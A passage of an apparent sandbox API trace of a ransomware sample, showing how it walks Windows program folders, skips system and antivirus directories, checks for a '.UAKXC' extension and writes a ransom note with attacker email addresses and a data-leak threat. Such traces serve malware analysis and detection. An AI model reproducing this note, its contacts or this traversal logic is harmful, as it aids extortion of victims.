ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0139.198] lstrcmpW (lpString1="SpeechEngines", lpString2=".") returned 1 [0139.198] lstrcmpW (lpString1="SpeechEngines", lpString2="..") returned 1 [0139.198] StrStrIW (lpFirst="SpeechEngines", lpSrch="tmp") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="winnt") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="temp") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="thumb") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="$Recycle.Bin") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="System Volume Information") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="Boot") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="Windows") returned 0x0 [0139.199] StrStrIW (lpFirst="SpeechEngines", lpSrch="Trend Micro") returned 0x0 [0139.199] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd10 [0139.199] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.199] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.199] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.199] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.199] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.199] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd10 | out: hHeap=0xea0000) returned 1 [0139.199] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecd10 [0139.199] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee590 [0139.200] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.200] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9c11cf80, ftLastAccessTime.dwHighDateTime=0x1d301bd, ftLastWriteTime.dwLowDateTime=0x9c11cf80, ftLastWriteTime.dwHighDateTime=0x1d301bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0139.200] lstrcmpW (lpString1="System", lpString2=".") returned 1 [0139.200] lstrcmpW (lpString1="System", lpString2="..") returned 1 [0139.200] StrStrIW (lpFirst="System", lpSrch="tmp") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="winnt") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="temp") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="thumb") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="$Recycle.Bin") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="System Volume Information") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="Boot") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="Windows") returned 0x0 [0139.200] StrStrIW (lpFirst="System", lpSrch="Trend Micro") returned 0x0 [0139.200] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec30d8 [0139.200] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2e18 [0139.200] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x76) returned 0xeb0550 [0139.200] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2e18 | out: hHeap=0xea0000) returned 1 [0139.200] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec30d8 | out: hHeap=0xea0000) returned 1 [0139.200] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecce8 [0139.200] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec018 [0139.200] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeb0550 | out: hHeap=0xea0000) returned 1 [0139.200] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17395f00, ftCreationTime.dwHighDateTime=0x1d59f7a, ftLastAccessTime.dwLowDateTime=0x62d6c500, ftLastAccessTime.dwHighDateTime=0x1d5d10d, ftLastWriteTime.dwLowDateTime=0x62d6c500, ftLastWriteTime.dwHighDateTime=0x1d5d10d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yahoomessenger.exe", cAlternateFileName="YAHOOM~1.EXE")) returned 1 [0139.200] lstrcmpW (lpString1="yahoomessenger.exe", lpString2=".") returned 1 [0139.200] lstrcmpW (lpString1="yahoomessenger.exe", lpString2="..") returned 1 [0139.200] StrStrIW (lpFirst="yahoomessenger.exe", lpSrch=".UAKXC") returned 0x0 [0139.200] StrStrIW (lpFirst="yahoomessenger.exe", lpSrch=".exe") returned=".exe" [0139.201] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17395f00, ftCreationTime.dwHighDateTime=0x1d59f7a, ftLastAccessTime.dwLowDateTime=0x62d6c500, ftLastAccessTime.dwHighDateTime=0x1d5d10d, ftLastWriteTime.dwLowDateTime=0x62d6c500, ftLastWriteTime.dwHighDateTime=0x1d5d10d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yahoomessenger.exe", cAlternateFileName="YAHOOM~1.EXE")) returned 0 [0139.201] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0139.201] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b28 | out: hHeap=0xea0000) returned 1 [0139.201] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.201] Sleep (dwMilliseconds=0x32) [0139.261] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2a50 | out: hHeap=0xea0000) returned 1 [0139.261] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3028 | out: hHeap=0xea0000) returned 1 [0139.261] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0139.261] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0139.261] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0139.261] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0139.261] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0139.261] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b28 [0139.261] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0139.262] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcdb0 [0139.262] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec080 [0139.262] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcdb0 | out: hHeap=0xea0000) returned 1 [0139.262] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0139.262] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b28 | out: hHeap=0xea0000) returned 1 [0139.262] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\google\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.262] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.262] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.263] CloseHandle (hObject=0x210) returned 1 [0139.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec080 | out: hHeap=0xea0000) returned 1 [0139.263] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0139.264] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5835d6b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5835d6b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.264] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5835d6b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5835d6b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.264] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e0ead20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e0ead20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Chrome", cAlternateFileName="")) returned 1 [0139.264] lstrcmpW (lpString1="Chrome", lpString2=".") returned 1 [0139.264] lstrcmpW (lpString1="Chrome", lpString2="..") returned 1 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="tmp") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="winnt") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="temp") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="thumb") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="$Recycle.Bin") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="System Volume Information") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="Boot") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="Windows") returned 0x0 [0139.264] StrStrIW (lpFirst="Chrome", lpSrch="Trend Micro") returned 0x0 [0139.264] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0139.264] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0139.264] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec080 [0139.264] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0139.264] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0139.264] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b28 [0139.264] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3028 [0139.264] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec080 | out: hHeap=0xea0000) returned 1 [0139.264] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c82ea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6c82ea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6c82ea80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0139.265] lstrcmpW (lpString1="CrashReports", lpString2=".") returned 1 [0139.265] lstrcmpW (lpString1="CrashReports", lpString2="..") returned 1 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="tmp") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="winnt") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="temp") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="thumb") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="$Recycle.Bin") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="System Volume Information") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="Boot") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="Windows") returned 0x0 [0139.265] StrStrIW (lpFirst="CrashReports", lpSrch="Trend Micro") returned 0x0 [0139.265] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeccc0 [0139.265] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0139.265] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0139.265] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec080 [0139.265] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0139.265] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0139.265] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeccc0 | out: hHeap=0xea0000) returned 1 [0139.265] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeccc0 [0139.265] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec0e8 [0139.265] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec080 | out: hHeap=0xea0000) returned 1 [0139.265] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5835d6b0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x5835d6b0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5835d6b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.265] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.265] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.265] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.265] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.265] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.265] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.265] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.265] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.265] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.265] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a6d180, ftCreationTime.dwHighDateTime=0x1d59ea7, ftLastAccessTime.dwLowDateTime=0x14a99e80, ftLastAccessTime.dwHighDateTime=0x1d5d553, ftLastWriteTime.dwLowDateTime=0x14a99e80, ftLastWriteTime.dwHighDateTime=0x1d5d553, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="trillian.exe", cAlternateFileName="")) returned 1 [0139.266] lstrcmpW (lpString1="trillian.exe", lpString2=".") returned 1 [0139.266] lstrcmpW (lpString1="trillian.exe", lpString2="..") returned 1 [0139.266] StrStrIW (lpFirst="trillian.exe", lpSrch=".UAKXC") returned 0x0 [0139.266] StrStrIW (lpFirst="trillian.exe", lpSrch=".exe") returned=".exe" [0139.266] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b330b0, ftCreationTime.dwHighDateTime=0x1d5b6fe, ftLastAccessTime.dwLowDateTime=0x84f196d0, ftLastAccessTime.dwHighDateTime=0x1d5de21, ftLastWriteTime.dwLowDateTime=0x84f196d0, ftLastWriteTime.dwHighDateTime=0x1d5de21, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winscp.exe", cAlternateFileName="")) returned 1 [0139.266] lstrcmpW (lpString1="winscp.exe", lpString2=".") returned 1 [0139.266] lstrcmpW (lpString1="winscp.exe", lpString2="..") returned 1 [0139.266] StrStrIW (lpFirst="winscp.exe", lpSrch=".UAKXC") returned 0x0 [0139.266] StrStrIW (lpFirst="winscp.exe", lpSrch=".exe") returned=".exe" [0139.266] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b330b0, ftCreationTime.dwHighDateTime=0x1d5b6fe, ftLastAccessTime.dwLowDateTime=0x84f196d0, ftLastAccessTime.dwHighDateTime=0x1d5de21, ftLastWriteTime.dwLowDateTime=0x84f196d0, ftLastWriteTime.dwHighDateTime=0x1d5de21, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="winscp.exe", cAlternateFileName="")) returned 0 [0139.266] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0139.266] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b78 | out: hHeap=0xea0000) returned 1 [0139.266] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.266] Sleep (dwMilliseconds=0x32) [0139.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0139.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec080 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec150 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0139.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec150 | out: hHeap=0xea0000) returned 1 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec150 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b78 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec220 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec288 [0139.340] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xee0108 [0139.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec288 | out: hHeap=0xea0000) returned 1 [0139.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec220 | out: hHeap=0xea0000) returned 1 [0139.340] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6b78 | out: hHeap=0xea0000) returned 1 [0139.340] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\internet explorer\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.341] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.341] WriteFile (in: hFile=0x210, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.343] CloseHandle (hObject=0x210) returned 1 [0139.343] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee0108 | out: hHeap=0xea0000) returned 1 [0139.343] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec150 | out: hHeap=0xea0000) returned 1 [0139.343] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x583f5c30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x583f5c30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.343] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x583f5c30, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x583f5c30, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.343] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.343] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.343] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0139.343] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0139.343] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0139.343] StrStrIW (lpFirst="en-US", lpSrch="tmp") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="winnt") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="temp") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="thumb") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="$Recycle.Bin") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="System Volume Information") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="Boot") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="Windows") returned 0x0 [0139.344] StrStrIW (lpFirst="en-US", lpSrch="Trend Micro") returned 0x0 [0139.344] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec150 [0139.344] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec220 [0139.344] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec150 | out: hHeap=0xea0000) returned 1 [0139.344] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6b78 [0139.344] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec150 [0139.344] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec220 | out: hHeap=0xea0000) returned 1 [0139.344] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a37297, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb2a37297, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb2a5d3f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x23800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0139.344] lstrcmpW (lpString1="ExtExport.exe", lpString2=".") returned 1 [0139.344] lstrcmpW (lpString1="ExtExport.exe", lpString2="..") returned 1 [0139.344] StrStrIW (lpFirst="ExtExport.exe", lpSrch=".UAKXC") returned 0x0 [0139.344] StrStrIW (lpFirst="ExtExport.exe", lpSrch=".exe") returned=".exe" [0139.344] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2be033e8, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2be033e8, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x90894420, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0xa0000003, dwReserved1=0x0, 